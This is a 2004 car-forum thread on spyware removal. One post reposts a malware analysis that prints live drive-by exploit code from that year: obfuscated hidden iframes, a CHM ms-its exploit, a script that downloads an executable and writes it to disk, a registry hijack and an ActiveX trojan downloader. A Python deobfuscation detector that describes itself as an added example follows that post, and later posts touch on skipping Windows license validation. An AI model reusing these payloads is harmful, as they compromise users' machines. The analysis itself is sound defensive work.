Beyond.ca

Beyond.ca - Car Forums : Powered by vBulletin version 2.3.9 Beyond.ca - Car Forums > Lounge > Computers, Consoles, and other Electronics > Spyware Removal And Prevention Guide!!!


GingeRRRBeef
[3/3] : LaQuessha

Spyware Removal And Prevention Guide!!! Updated 6/18

Updated 6-16-2004
Spyware Removal And Prevention Guide!!!
So the big question, what exactly is Spyware?: Spyware is a cookie or program installed onto your system by other programs or from a website without your knowledge and without your permission.
The spyware then "watches" you while you surf the web, and in some cases will monitor you sending e-mail or playing games. The spyware then sends back this information to the author/source, which can sometimes be personal or sensitive data - otherwise known as "calling home". You will usually receive pop-ups advertising Internet security or the very much needed "Pop-up blocker". Some of the worst spyware has been documented to steal your most personal information from your computer, such as credit card numbers and social security numbers.

Where this spyware comes from isn't always the easiest to find out. Some of the most common spyware comes from "Gator," "Comet Cursor" and "Hotbar". Most free programs that proclaim to let you freely change to new screen savers and other uses are not really free. They contain spyware to watch your surfing habits, log information and advertise to you. Now before you start to panic, bear in mind that not all free programs contain spyware.
For the rest of the guide: GO HERE!



Updated 6-17-2004
Spyware Removal Tools Compared
With spyware on the rise we wanted to see which spyware/adware removal tool worked best under an infected machine. We placed 5 spyware/adware scanning and removing applications head-to-head to see which one gave the best results as far as finding the most infected objects. Read the full article @ Flexbeta.net



Updated 6-18-2004
Why You Should Dump Internet Explorer
Interesting read in which an MCSE (MS Certified Software Engineer) comments on how bad IE really is...
Are you still using IE?



Updated 6-18-2004
Ten Steps to a Secure PC
PCStats have thrown up a new beginners' guide to securing your PC against viruses, Trojan horses and more! Here's a snip.

With this guide, PCstats has set out to inform you clearly and concisely of the dangers you face, and the steps you can take to avoid them. Once you look through, I think you'll be struck by how little effort is required to make your PC more secure. Even performing the first five steps of this guide will make your system better protected than the vast majority of Internet connected PCs. It is not wise to rely on the comparative anonymity of the Internet to keep you safe. If you do, you will be burned eventually and inevitably. Secure your PC now to avoid future regrets.
For the rest of the guide: GO HERE!

Updated 8-31-2004
Rogue/Suspect Anti-Spyware Products & Web Sites


Last edited by GingeRRRBeef on 08-31-2004 at 10:31 PM


Old Post 04-27-2004 03:56 AM
 
D'z Nutz
Super Moderator

Good idea. We get spyware related posts at least once a week here (seriously).


Old Post 04-27-2004 04:20 AM
hjr
Third Gear

good post man.


Old Post 04-28-2004 01:15 AM
GingeRRRBeef
[3/3] : LaQuessha

New Spyware article on www.wired.com


"My first question, when something goes wrong on a computer or the network, is: What did you do right before the problem started? Ninety-nine percent of all computer problems are caused by what people did to their computers. But 99 percent of the people, 99 percent of the time, will insist that they did absolutely nothing odd or unusual before the computer died," said John Vitelle, a Chicago-based systems administrator.




"No one installs it, yet this garbage is on so many machines. Obviously the spyware fairy shows up late at night and installs the junk on their systems," said Keith Hitchens, who maintains networks for several clients, including a Manhattan public relations firm and a magazine-publishing business.


Last edited by GingeRRRBeef on 04-29-2004 at 01:13 AM


Old Post 04-29-2004 01:05 AM
Gonthro
Banned - rage2's abuse at it's finest

spyware sucks, i ran 3 different spyware programs last week and every one, right after another, picked up at least 3-4 other spyware progs that the previous one missed, i used adaware 6, spybot, and free-av

it sawks

they should just start charging anyone that advertises with spyware companies, that way they won't get any business and will eventually go away.


Old Post 06-17-2004 08:37 PM
GingeRRRBeef
[3/3] : LaQuessha

updates!!!


Old Post 06-18-2004 07:15 PM
ricosuave
Second Gear

http://forums.anandtech.com/message...eyword1=spyware


Old Post 07-07-2004 08:16 AM
Kobe
Second Gear

NEED A FREE PROGRAM TO DELETE SOME SPYWARE

AHHHH im infested hahaha


Old Post 07-26-2004 02:36 AM
googe
Banned

eye opening article...


Follow the Bouncing Malware - Part I

On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.

Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then (for whatever reason... hey, it's what my "Joe Average" did) skipped several obvious links leading to Yahoo! and clicked instead on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companies then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogamez website results in a flurry of HTTP activity, including the following:

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:

-----------------------------------------------------------------------------------------------------------

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&clientid=431&zoneid=450&source=&
block=86400&capping=3&cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>


-----------------------------------------------------------------------------------------------------------

This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:

<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>


-----------------------------------------------------------------------------------------------------------

Looks like someone is trying to hide something... This decodes to:

<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

Which gives us:
-----------------------------------------------------------------------------------------------------------

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>


-----------------------------------------------------------------------------------------------------------

Which decodes to:

<textarea id="code" style="display:none;">
    <object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('hp2.htm'))));
</script>


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:

-----------------------------------------------------------------------------------------------------------

<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>


-----------------------------------------------------------------------------------------------------------

Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

-----------------------------------------------------------------------------------------------------------

<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>


-----------------------------------------------------------------------------------------------------------

Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.

At this point, I followed one link on the site that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:

Now, this code within popup.js is executed:

-----------------------------------------------------------------------------------------------------------

if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\" src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

-----------------------------------------------------------------------------------------------------------

var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab" HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes
ATPartnets.dll - 96,256 bytes

The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan

And that's where I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on its merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.

Last edited by googe on 09-30-2004 at 09:17 AM


Old Post 07-26-2004 02:53 AM
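The \uXXXX-escaped document.write() trick in the diary above defeats any scanner that only looks at the raw HTML, and the second stage goes one step further by writing the entity &#109; in place of the "m" so that even the decoded layer does not contain the literal string "ms-its:". The following Python is an added example, not part of the quoted diary and not any vendor's tool: it pulls escaped document.write() literals out of captured HTML, decodes them the way the browser would, HTML-unescapes every layer, and then flags the indicators the diary shows (1x1 iframes, ms-its: URIs, ActiveX classid objects). The first sample is the escaped literal captured from mynet-MML.html as printed in the post; the other two samples are constructed here from the decoded object line and the WScript.Shell object that also appear in the post.

```python
import html
import re
from dataclasses import dataclass

# Sample 1: the escaped document.write() literal from 205.236.189.58/mynet/mynet-MML.html,
# copied from the diary above (line breaks are extraction wrapping, not part of the literal).
MYNET_ESCAPED = r"""
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e
"""
MYNET_PAGE = '<script type="text/javascript">document.write(\'' + MYNET_ESCAPED + "')</script>"


def encode_js_unicode(text: str) -> str:
    """Escape every character as \\uXXXX, the way the obfuscator in the diary does."""
    return "".join(f"\\u{ord(ch):04x}" for ch in text)


# Sample 2 (constructed): the decoded ms-its object line from hp2.htm, re-escaped like the
# second stage did. Note the &#109; entity standing in for the "m" of ms-its.
HP2_OBJECT = r'<object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm" type="text/x-scriptlet"></object>'
HP2_PAGE = "<script>document.write('" + encode_js_unicode(HP2_OBJECT) + "')</script>"

# Sample 3 (constructed): the WScript.Shell object from object-c002.cgi, with no escaping at all.
WSH_PAGE = "<html><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object></html>"

UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
# document.write('...') with a single-quoted literal; the literal may be wrapped across lines.
WRITE_LITERAL = re.compile(r"document\.write\(\s*'((?:[^'\\]|\\.)*)'\s*\)", re.S)

INDICATORS = [
    ("hidden-iframe", re.compile(r"<iframe[^>]*\b(?:width|height)=['\"]?[01]\b", re.I)),
    ("ms-its-uri", re.compile(r"\bms-its:", re.I)),
    ("activex-object", re.compile(r"classid\s*=\s*['\"]?clsid:[0-9a-f-]+", re.I)),
]


@dataclass
class Finding:
    rule: str
    evidence: str


def decode_js_unicode(literal: str) -> str:
    """Turn \\uXXXX sequences back into characters, dropping line wrapping first."""
    compact = literal.replace("\r", "").replace("\n", "")
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), compact)


def analyse(page: str) -> list:
    """Scan the raw page plus every decoded document.write() layer for indicators."""
    findings = []
    layers = [page]
    for match in WRITE_LITERAL.finditer(page):
        literal = match.group(1)
        if UNICODE_ESCAPE.search(literal):
            decoded = decode_js_unicode(literal)
            findings.append(Finding("unicode-escaped-write", decoded[:72]))
            layers.append(decoded)
    for layer in layers:
        # Resolve HTML entities so that "&#109;s-its:" is seen as "ms-its:".
        text = html.unescape(layer)
        for rule, pattern in INDICATORS:
            for hit in pattern.finditer(text):
                findings.append(Finding(rule, hit.group(0)))
    return findings


def rules_for(page: str) -> set:
    """The set of rule names that fired for a page; handy for triage and tests."""
    return {f.rule for f in analyse(page)}


if __name__ == "__main__":
    samples = (("mynet-MML.html", MYNET_PAGE), ("hp2.htm", HP2_PAGE), ("object-c002.cgi", WSH_PAGE))
    for name, page in samples:
        print(name)
        for finding in analyse(page):
            print(f"  {finding.rule}: {finding.evidence}")
```

Only the decoded layers trigger the iframe and ms-its rules; the raw HTML of the first two samples matches nothing, which is exactly why the obfuscation was worth the attacker's effort. A real scanner would also loop, since a decoded layer can itself contain another escaped document.write().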
GingeRRRBeef
[3/3] : LaQuessha

Updates!!!

Updated 8-31-2004
Rogue/Suspect Anti-Spyware Products & Web Sites


Old Post 08-31-2004 10:31 PM
civic_stylez
Second Gear

thanks a lot for the post, my computer was totally full of crap! that new firefox has helped a lot too. thanks again!


Old Post 01-09-2005 10:53 PM
ricosuave
Second Gear

http://www.microsoft.com/downloads/...mp;Hash=JFJYHY7


Old Post 01-10-2005 12:04 AM
dragonone
First Gear

i use norton 05 and opera
i only use IE rarely and only for emails or sites that require specific plug-ins

so far for most ppl that followed this roughly they have no problems

I guess you have to be careful when you visit sites
ie. finding a crack on astalavista, usually when you find one and there's a 'download' button and you click on it on IE (w/o antivirus etc) you're bound to get the spyware/virus. when you use opera and norton to click it, opera first asks you if you want to d/l the xxx.exe generic spyware file-something like sexphone.exe, then norton blocks the virus exploit

just a thought >.<


Old Post 03-01-2005 12:12 PM
/////AMG
FKA: Porsche_944

So does firefox!


Old Post 03-01-2005 01:28 PM
pantharen
Newbie

This download is available to customers running genuine Microsoft Windows. Please click Continue to begin Windows validation.



Not all of us run legit copies of XP, personally I do like my copy of Corp XP.

However, my laptop has XP Home, and I also use Firefox.


Old Post 03-27-2005 06:46 PM
legendboy
AMG Killer

i personally use this, it has very good functionality, especially real time protection


Old Post 03-27-2005 07:16 PM
pantharen
Newbie

Originally posted by legendboy


i personally use this, it has very good functionality, especially real time protection



Only thing I don't like about Giant anti-Spy (Yes I know it's beta) is it crashes my computer randomly.

I've had some serious issues with it on both Pro & Home. Being that it's now a M$ product, they're not going to do much about it.


Old Post 03-27-2005 07:31 PM
roopi
Second Gear

Originally posted by pantharen



Not all of us run legit copies of XP, personally I do like my copy of Corp XP.

However, my laptop has XP Home, and I also use Firefox.




You don't need to have a legit copy of XP to download this. The second step lets you skip the verification process.

I've found the MS Spyware Checker to be the best.


Old Post 03-27-2005 08:25 PM
pantharen
Newbie

Originally posted by roopi



You don't need to have a legit copy of XP to download this. The second step lets you skip the verification process.

I've found the MS Spyware Checker to be the best.



Ahhh then they have changed it, I downloaded days after M$ bought Giant, and they wouldn't allow my "copy" of XP to download it, they wanted me to contact M$.


Old Post 03-27-2005 08:40 PM
Magic
Newbie

Originally posted by pantharen


Only thing I dont like about Giant anti-Spy (Yes I know it's beta) is it crashes my computer randomly.

I've had some serious issues with it on both Pro & Home. Being that it's now a M$ product, they're not going to do much about it.



Actually as of today, you need to have a Genuine copy of Windows XP (or a genuine CORP key) to use windows update or download most microsoft applications. Skipping or "disabling" the verification plugin won't do shit, you will only get access to "some" critical updates and not all of them. Automatic Updates will still work but will again only download a few critical updates.


Old Post 07-28-2005 08:09 AM